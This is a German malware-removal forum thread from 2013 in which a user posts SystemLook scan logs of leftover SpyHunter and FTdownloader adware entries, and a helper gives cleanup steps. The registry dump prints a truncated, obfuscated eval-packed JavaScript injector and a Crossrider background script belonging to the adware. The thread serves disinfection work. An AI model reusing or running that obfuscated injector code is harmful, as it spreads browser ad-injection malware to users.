[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayIcon"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
-= EOF =-
|
|
13.08.2013, 09:44
| #23 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | SpyHunter4 als Pc-Scanner... SpyHunter entfernen Die folgende Datei hilft dir das Programm restlos zu deinstallieren:
Wiederhole bitte auch den Schritt mit Systemlook und poste davon die neuen Ergebnisse
__________________ Logfiles bitte immer in CODE-Tags posten |
|
13.08.2013, 12:00
| #24 |
| | SpyHunter4 als Pc-Scanner... Bei Systemsteuerung -> Programme und Funktionen habe ich noch mal was mit dem Namen SpyHunter gefinden. Hat aber nicht das Icon von SpyHunter Code:
ATTFilter SystemLook 30.07.11 by jpshortstuff
Log created at 10:48 on 13/08/2013 by Moritz
Administrator - Elevation successful
========== filefind ==========
Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll --a---- 393216 bytes [12:16 26/07/2013] [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe --a---- 338432 bytes [12:16 26/07/2013] [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll --a---- 473088 bytes [12:16 26/07/2013] [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe --a---- 442880 bytes [12:16 26/07/2013] [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-helper.exe --a---- 311808 bytes [12:16 26/07/2013] [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0.ico --a---- 9662 bytes [11:19 30/06/2013] [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk --a---- 726 bytes [07:36 13/08/2013] [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader --a---- 4256 bytes [12:16 26/07/2013] [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler --a---- 4166 bytes [12:16 26/07/2013] [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater --a---- 4262 bytes [12:16 26/07/2013] [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job --a---- 1226 bytes [12:16 26/07/2013] [07:27 13/08/2013] 3FB5E9A85AA0F499D86530241DACB64B
C:\Windows\Tasks\FTdownloader V4.0-enabler.job --a---- 1136 bytes [12:16 26/07/2013] [07:27 13/08/2013] FF2CF9A43027FE63CBF838105BF502B4
C:\Windows\Tasks\FTdownloader V4.0-updater.job --a---- 1232 bytes [12:16 26/07/2013] [07:27 13/08/2013] F62D368B093CC484B99E203338E25C37
Searching for "*Spyhunter*"
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\SpyHunter.lnk --a---- 12130 bytes [13:26 12/08/2013] [13:26 12/08/2013] 7FB1162DAB9E2DA90C88CCECD0C87808
C:\Users\Moritz\Downloads\SpyHunterKiller.exe ------- 463693 bytes [08:46 13/08/2013] [08:46 13/08/2013] 82717E3F11623215BE019760252C4E03
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf --a---- 165806 bytes [17:24 27/07/2013] [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8
========== folderfind ==========
Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0 d------ [12:15 26/07/2013]
C:\Users\Moritz\AppData\Local\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou d------ [12:15 26/07/2013]
Searching for "*Spyhunter*"
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02 d----c- [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b d----c- [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1 d----c- [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981 d----c- [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0 d----c- [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35 d----c- [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7 d----c- [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e d----c- [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a d----c- [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876 d----c- [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652 d----c- [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6 d----c- [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450 d----c- [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02 d----c- [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b d----c- [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1 d----c- [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981 d----c- [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0 d----c- [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35 d----c- [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7 d----c- [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e d----c- [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a d----c- [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876 d----c- [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652 d----c- [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6 d----c- [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450 d----c- [17:54 07/08/2013]
========== regfind ==========
Searching for "FTdownloader"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="
/************************************************************************************
This is your background code.
For more information please visit our wiki site:
hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/
appAPI.ready(function($) {
var version="4.0";
try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
injectorBack.init("ftdown4", version, "htd");
});
"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==\\\"0\\\"){4S()}1O if(a.2V!=\\\"1\\\"||
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
@="FTDownloader URI"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
"Content Type"="application/x-FTDownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\DefaultIcon]
@="C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\shell\open\command]
@=""C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe" /u="%1""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FTdownloader V4.0]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp]
"path"="C:\Program Files (x86)\FTDownloader.com\FTDownloader10.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="
/************************************************************************************
This is your background code.
For more information please visit our wiki site:
hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/
appAPI.ready(function($) {
var version="4.0";
try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
injectorBack.init("ftdown4", version, "htd");
});
"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
